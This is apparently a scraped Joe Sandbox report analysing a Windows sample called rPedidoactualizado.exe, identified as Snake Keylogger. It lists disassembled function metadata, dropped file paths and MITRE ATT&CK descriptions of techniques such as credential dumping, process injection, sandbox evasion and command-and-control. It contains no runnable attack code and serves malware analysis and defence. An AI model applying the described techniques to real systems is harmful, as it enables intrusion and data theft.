Function 004EF2C0 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

2, xrefs: 004EF2C4

Memory Dump Source

Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: b7594bb024f2f697a6d7711a7619b4cd38cfacfea9224e29e2945799c395d6a7
Instruction ID: ccf124b480894f0e3d1f0b760347d95685d1793329d30bfd8226a5c8411d83fe
Opcode Fuzzy Hash: b7594bb024f2f697a6d7711a7619b4cd38cfacfea9224e29e2945799c395d6a7
Instruction Fuzzy Hash: 88515970D01248CBDB04DFAAC5447EEBBB2BF89306F24C52AD4047B295DB799885CF58

Function 004EF974 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbd3473c2340e6c765fe4c23ac73c8ce65f2b65829e74a4d21a0cc0b6ce8e525
Instruction ID: d7abbe118dec8cf8f101cdc2b7463a8a475a4e3fadaf9f787df156879ef409e7
Opcode Fuzzy Hash: cbd3473c2340e6c765fe4c23ac73c8ce65f2b65829e74a4d21a0cc0b6ce8e525
Instruction Fuzzy Hash: 82C1B074E00218CFDB54DFA5C954B9DBBB2BF89305F2084AAD809AB365DB385E85CF14

Function 004EF52F Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aca7f62392d35016f3731d627b1ff9f575275e6ffc5c7c5f2c9fd907159da5a
Instruction ID: 90aacd4453d2095a07a038647e594a77a43d848ee87e074d30852cc5c41f6a9c
Opcode Fuzzy Hash: 2aca7f62392d35016f3731d627b1ff9f575275e6ffc5c7c5f2c9fd907159da5a
Instruction Fuzzy Hash: 59517D70D01248CFCB04DFAAD5847EEBBB2FF59306F60852AD405AB296D7399885CF58

Function 004EF4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df99b0f9d28a750e0edb4990874fba534adcda228b0b27f2e86cb546f952ebe8
Instruction ID: ed3be3f6fbec4548ef351e2b2a854bf2bf279fdcac105a8fcb8e582e779289e3
Opcode Fuzzy Hash: df99b0f9d28a750e0edb4990874fba534adcda228b0b27f2e86cb546f952ebe8
Instruction Fuzzy Hash: FD516870D01248CFDB04DFAAD5847EEBBB2FF59306F20852AE405AB285D7399885CF58

Function 004E76F1 Relevance: 10.5, Strings: 8, Instructions: 475COMMON

Download Yara Rule

Strings

(o]q, xrefs: 004E7C0F
(o]q, xrefs: 004E77E9
,aq, xrefs: 004E7BA0
(o]q, xrefs: 004E7815
(o]q, xrefs: 004E7BFF
,aq, xrefs: 004E7B90
(o]q, xrefs: 004E78B2
(o]q, xrefs: 004E772E

Memory Dump Source

Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-1435242062
Opcode ID: 98d7b7d57c2c692234a272856c8da6500445de5f2362c39fb292e7d1f9fd2b1e
Instruction ID: fc489dd9b6653223dab660400da7afe800ad1aab826a169cc97b20cf78825a20
Opcode Fuzzy Hash: 98d7b7d57c2c692234a272856c8da6500445de5f2362c39fb292e7d1f9fd2b1e
Instruction Fuzzy Hash: 05129C30A042499FCB14CF6AC984AAEBBF6FF49325F24859AE405DB361D734ED41CB54

Function 004E1A18 Relevance: 5.1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

FK, xrefs: 004E1B47
FK, xrefs: 004E1B10
FK, xrefs: 004E1A47
FK, xrefs: 004E1B64

Memory Dump Source

Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd

Similarity

API ID:
String ID: FK$FK$FK$FK
API String ID: 0-1956935488
Opcode ID: 3bef3456ae68db790bb255afe018e35ff907d5b74a5641ae70a8b2ce38940868
Instruction ID: 0473d8ebb5b7ad990ee159c42a3fb23b8e4ef3ff6caf1b2b89da356269736ea3
Opcode Fuzzy Hash: 3bef3456ae68db790bb255afe018e35ff907d5b74a5641ae70a8b2ce38940868
Instruction Fuzzy Hash: 8641D370A052489FC709EFB9C4416AFBBB2EF85305F2089AED4049B365DB385E42CF95

Function 004E6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 004E695E
\;]q, xrefs: 004E6936
\;]q, xrefs: 004E6952
\;]q, xrefs: 004E692C

Memory Dump Source

Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: 1d23c098345ff822f272269f68ca94638125cf74c91f88fe6cffa3df7a43ecb8
Instruction ID: 0a4fc4d2ba235bd7d2c4a8e2a33a6042aa9b94e2e3fcd66aee2522d2d6b97e1a
Opcode Fuzzy Hash: 1d23c098345ff822f272269f68ca94638125cf74c91f88fe6cffa3df7a43ecb8
Instruction Fuzzy Hash: FC01F7B17401448FC7248E2EC58093A37EABFA8BA2B26447BE445CB376DA35DC41C759

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rPedidoactualizado.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1z4idokb.q3f.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3duzehv.u43.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpta4ulm.qnx.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzkhcuw1.u5x.ps1

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Bevidstgjorde.ren

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Unlawfulness.Non

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Yellowfin.pre

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\kakaosmrs.txt

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exe

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exe:Zone.Identifier

Static File Info

Windows Analysis Report
rPedidoactualizado.exe

Function 0040336C Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Function 0040543E Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 004059A9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 004065DA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Function 00403D35 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 00403987 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402EDD Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Function 004062B9 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 004052FF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 00406601 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre